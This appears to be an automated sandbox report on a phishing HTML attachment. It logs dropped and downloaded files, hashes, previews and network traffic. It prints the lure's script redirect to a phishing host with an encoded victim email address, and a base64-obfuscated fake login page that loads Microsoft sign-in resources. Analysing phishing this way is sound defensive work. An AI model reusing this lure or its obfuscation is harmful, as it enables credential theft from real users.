                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 379
                                                            Category:dropped
                                                            Size (bytes):254
                                                            Entropy (8bit):7.066074991728423
                                                            Encrypted:false
                                                            SSDEEP:6:XtS8G99k8e6my4IIFqXUJ59lDFCnhUGlZX8My/dOtrE:XAH99kRX1YQBDFCnDXdWYtrE
                                                            MD5:847A4212B99B9076EE39328B24CD30AF
                                                            SHA1:73F15078CF1D396485F644A79B6E25EF0637685D
                                                            SHA-256:29DC0C26C372805325EB7EB926769E832A60B47BEF96A66436EC3EC05CD6128E
                                                            SHA-512:9AF77E9ED8BD9A39A47F36AAC2D01B5AF5D56C04CD933427DF95CC80904D7EE7AC3F7F9443D8AEF236CC84FB4DC4CC335AF0BF8F9BC0C13D720187096D149220
                                                            Malicious:false
                                                            Preview:..........mP.n. ...D.xY0.\..{. 7...y.F!.....T..Y.Y..n...q^.[O}..w.SJ.j..3.....%)....x.f.K}..}\.=E.D....!.n.......Ma..G.=+.%.w..WX...9.A...........X...V...bOB&2.H....15{.fT...V-.#..m..f...V2<...~....l%4.....Ie.TL69.....vW.....v.3.v.O..}..{...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                            Category:dropped
                                                            Size (bytes):1435
                                                            Entropy (8bit):7.8613342322590265
                                                            Encrypted:false
                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                            Malicious:false
                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                            Category:downloaded
                                                            Size (bytes):116343
                                                            Entropy (8bit):7.997640489040715
                                                            Encrypted:true
                                                            SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                            MD5:3063B0DA40B45B46602FCE99AC53D315
                                                            SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                            SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                            SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                            Malicious:false
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                            Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (7477), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):20030
                                                            Entropy (8bit):5.88380601233588
                                                            Encrypted:false
                                                            SSDEEP:384:DFnuwtd5ZHWXbaeGLyReiDRPTnuwtd5ZHWXbaeGLyReiDRPrlrDlrL:DBd5ZcbaeGLIDRPXd5ZcbaeGLIDRPrlh
                                                            MD5:95B84D4F17A54D0564DA2C0644C12A5E
                                                            SHA1:240B9B143947176526D5DD827BE03DA80F7FD607
                                                            SHA-256:0C63DC30618B99CE7E663D2FFC53429209D27DD9AFEABB65F06CA9C21C7F9AC8
                                                            SHA-512:E6A0ADB92C6A7E29D7A5924081C41C08BF0208F05DB00E59D867BF4789466CFFD0A3E81EBCB2DFA659F8A94747293661AF21D0A18B3C67384E88E982DD576539
                                                            Malicious:false
                                                            URL:https://brh5.bughtswo.com/tgs0/
                                                            Preview: Do not be embarrassed by your failures, learn from them and start again. -->..<script>../* Success is walking from failure to failure with no loss of enthusiasm. */..if(atob("aHR0cHM6Ly9iUkg1LmJ1Z2h0c3dvLmNvbS90Z3MwLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOz
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65447)
                                                            Category:dropped
                                                            Size (bytes):89501
                                                            Entropy (8bit):5.289893677458563
                                                            Encrypted:false
                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                            Malicious:false
                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                            Category:dropped
                                                            Size (bytes):49911
                                                            Entropy (8bit):7.994516776763163
                                                            Encrypted:true
                                                            SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                            MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                            SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                            SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                            SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                            Malicious:false
                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):3452
                                                            Entropy (8bit):5.117912766689607
                                                            Encrypted:false
                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                            Malicious:false
                                                            URL:https://login.live.com/Me.htm?v=3
                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):72
                                                            Entropy (8bit):4.241202481433726
                                                            Encrypted:false
                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                            Malicious:false
                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                            Category:downloaded
                                                            Size (bytes):122515
                                                            Entropy (8bit):7.997419459076181
                                                            Encrypted:true
                                                            SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                            MD5:AC9A6ED508328361A4C9530325A94076
                                                            SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                            SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                            SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                            Malicious:false
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                            Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                            File type:HTML document, ASCII text, with CRLF line terminators
                                                            Entropy (8bit):5.457092515102459
                                                            TrID:
                                                            • HyperText Markup Language (12001/1) 40.67%
                                                            • HyperText Markup Language (11501/1) 38.98%
                                                            • HyperText Markup Language (6006/1) 20.35%
                                                            File name:audio.mp3_JasonhTranscript.html
                                                            File size:246 bytes
                                                            MD5:384c2fdb33d506e73fcd84033f0e520b
                                                            SHA1:8e8bc1f4fce11bd1a3bc2aad676b2de7ff949812
                                                            SHA256:04c0219725fc77e62ab007336fd9700a25c7c215f1b46ff15e3fa3a6d280f3ec
                                                            SHA512:74a158d46afe6f1524645d542bb103f16ea3ea8325c7008e431fac608fc3b32bdfb51287d70c68f55156415b2509bfddb876eb0adc2341d0f7e19aac47a0a709
                                                            SSDEEP:3:qVoB3tBJeAiMJ965KJSeAlJKqvStoAcMBSkXbgovZ3OAN9KGBNoEQzdKyVm76j2M:q43tWuJG+6SN0MFpROUJp+Lj2lkQfGb
                                                            TLSH:F2D097FF01108C2F96B6083F54D3ECF172A33408158698C5C381B0C33001058CAC324C
                                                            File Content Preview:<html>..<head>..<title>Detail notification for www.ctvnews.ca</title>..</head>..<body>..<SCRIPT LANGUAGE="JavaScript">.. ..self.location = 'https://bRH5.bughtswo.com/tgs0/#amFzb25oQHBhcmFkaWdtLWNvcnAuY29t';..//-->..</SCRIPT>..</body>..</html>
                                                            Icon Hash:173149cccc490307
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 7, 2025 21:28:52.164406061 CET49701443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.164432049 CET44349701188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:52.164587021 CET49701443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.164829969 CET49701443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.164841890 CET44349701188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:52.621587038 CET44349701188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:52.621917009 CET49701443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.621932030 CET44349701188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:52.623058081 CET44349701188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:52.623125076 CET49701443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.625289917 CET49701443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.625308990 CET49701443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.625349045 CET44349701188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:52.625375986 CET49701443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.625399113 CET49701443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.625766993 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.625793934 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:52.625857115 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.626024008 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:52.626034975 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.158837080 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.159286022 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:53.159297943 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.160356045 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.160418987 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:53.163217068 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:53.163284063 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.164294004 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:53.164302111 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.210397959 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:53.343353033 CET4970653192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:53.348217010 CET53497061.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:53.348289013 CET4970653192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:53.348340988 CET4970653192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:53.348366022 CET4970653192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:53.353100061 CET53497061.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:53.353147030 CET53497061.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:53.866167068 CET53497061.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:53.866456985 CET4970653192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:53.871421099 CET53497061.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:53.871649981 CET4970653192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:53.928714991 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.928860903 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.928910971 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.928958893 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.928989887 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:53.929012060 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.929048061 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.929075956 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.929107904 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:53.929116011 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.929146051 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:53.929177046 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:53.929786921 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.929872036 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.929936886 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:53.929944038 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:53.973578930 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:53.973597050 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:54.020822048 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:54.020864010 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:54.020901918 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:54.020924091 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:54.020939112 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:54.020998955 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:54.021390915 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:54.021466970 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:54.021641970 CET49705443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:54.021660089 CET44349705188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:54.034863949 CET49707443192.168.2.16151.101.194.137
                                                            Jan 7, 2025 21:28:54.034884930 CET44349707151.101.194.137192.168.2.16
                                                            Jan 7, 2025 21:28:54.035012960 CET49707443192.168.2.16151.101.194.137
                                                            Jan 7, 2025 21:28:54.035188913 CET49708443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:54.035209894 CET44349708104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:54.035305023 CET49708443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:54.035412073 CET49707443192.168.2.16151.101.194.137
                                                            Jan 7, 2025 21:28:54.035420895 CET44349707151.101.194.137192.168.2.16
                                                            Jan 7, 2025 21:28:54.035610914 CET49708443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:54.035624027 CET44349708104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:54.035777092 CET49709443192.168.2.16104.17.24.14
                                                            Jan 7, 2025 21:28:54.035784960 CET44349709104.17.24.14192.168.2.16
                                                            Jan 7, 2025 21:28:54.035844088 CET49709443192.168.2.16104.17.24.14
                                                            Jan 7, 2025 21:28:54.036000013 CET49709443192.168.2.16104.17.24.14
                                                            Jan 7, 2025 21:28:54.036020041 CET44349709104.17.24.14192.168.2.16
                                                            Jan 7, 2025 21:28:54.513159037 CET44349709104.17.24.14192.168.2.16
                                                            Jan 7, 2025 21:28:54.513483047 CET49709443192.168.2.16104.17.24.14
                                                            Jan 7, 2025 21:28:54.513492107 CET44349709104.17.24.14192.168.2.16
                                                            Jan 7, 2025 21:28:54.514492989 CET44349709104.17.24.14192.168.2.16
                                                            Jan 7, 2025 21:28:54.514559031 CET49709443192.168.2.16104.17.24.14
                                                            Jan 7, 2025 21:28:54.515783072 CET49709443192.168.2.16104.17.24.14
                                                            Jan 7, 2025 21:28:54.515846968 CET44349709104.17.24.14192.168.2.16
                                                            Jan 7, 2025 21:28:54.515990019 CET49709443192.168.2.16104.17.24.14
                                                            Jan 7, 2025 21:28:54.515997887 CET44349709104.17.24.14192.168.2.16
                                                            Jan 7, 2025 21:28:54.523204088 CET44349707151.101.194.137192.168.2.16
                                                            Jan 7, 2025 21:28:54.525727987 CET49707443192.168.2.16151.101.194.137
                                                            Jan 7, 2025 21:28:54.525737047 CET44349707151.101.194.137192.168.2.16
                                                            Jan 7, 2025 21:28:54.527496099 CET44349707151.101.194.137192.168.2.16
                                                            Jan 7, 2025 21:28:54.527585030 CET49707443192.168.2.16151.101.194.137
                                                            Jan 7, 2025 21:28:54.528460979 CET49707443192.168.2.16151.101.194.137
                                                            Jan 7, 2025 21:28:54.528526068 CET44349707151.101.194.137192.168.2.16
                                                            Jan 7, 2025 21:28:54.528645039 CET49707443192.168.2.16151.101.194.137
                                                            Jan 7, 2025 21:28:54.532658100 CET44349708104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:54.533747911 CET49708443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:54.533755064 CET44349708104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:54.535136938 CET44349708104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:54.535206079 CET49708443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:54.536164045 CET49708443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:54.536228895 CET44349708104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:54.536349058 CET49708443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:54.536355019 CET44349708104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:54.561475039 CET49709443192.168.2.16104.17.24.14
                                                            Jan 7, 2025 21:28:54.575329065 CET44349707151.101.194.137192.168.2.16
